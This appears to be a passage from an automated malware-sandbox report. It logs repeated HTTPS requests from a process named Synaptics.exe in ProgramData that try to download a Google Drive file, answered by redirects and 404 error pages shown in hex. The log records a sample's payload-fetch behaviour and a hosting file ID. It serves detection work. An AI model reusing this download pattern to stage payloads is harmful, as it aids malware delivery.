                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        51192.168.2.750004142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:21 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        52192.168.2.750005142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:21 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        53192.168.2.750007142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:21 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        54192.168.2.750015142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:22 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC4lQun2pwI-_fZ7VQBA-5boXVt7qC0bOuHMkaQrEVZ_fhDewdBV2uVav1Q-z30CcrA_
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-x4mOr7Ug1u9nrwJskkTDdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                        2024-12-30 10:48:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 69 56 53 4f 4f 55 61 77 4c 59 58 49 79 72 77 4e 7a 70 51 66 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="1iVSOOUawLYXIyrwNzpQfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                        2024-12-30 10:48:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        55192.168.2.750016142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-MABq3mFa2lxC1p2ZZ-cEgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        56192.168.2.750014142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:22 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:22 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:22 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TYKuxfAXY1oy6oFgNfwtsg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        57192.168.2.750025142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:23 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC57s5J1nJCb35vBn4m1xPQBBL1wzk6KlKSRAB7caIZrZZJJCWeuwYe24DCOkMWLvEPqOaBVO9E
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Nxh5i3nJ4tetKMuZ5T9-Bw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:23 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                        2024-12-30 10:48:23 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 6e 73 51 30 72 33 36 4a 35 70 44 6b 4c 77 54 54 63 62 76 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="XnsQ0r36J5pDkLwTTcbvBw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                        2024-12-30 10:48:23 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        58192.168.2.750026142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:23 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-YvS2lX-aKg7lx8jcXzkf-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        59192.168.2.750027142.250.185.784437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:23 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
                                                                                                                                                        2024-12-30 10:48:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:23 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LBvKSB0D57AzhDOTIpQL_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        60192.168.2.750028142.250.186.1614437744C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-30 10:48:23 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                                                                                                                                        2024-12-30 10:48:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC59Sdkyv2ux1gBeG63q0xc-WTy238cTxQUab6Z1Yjz6x15FkOUdNHk_3iqM1xkLBwOghMc_-08
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:24 GMT
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DceZHgr2ScX6ZlEZnGgEtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-30 10:48:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
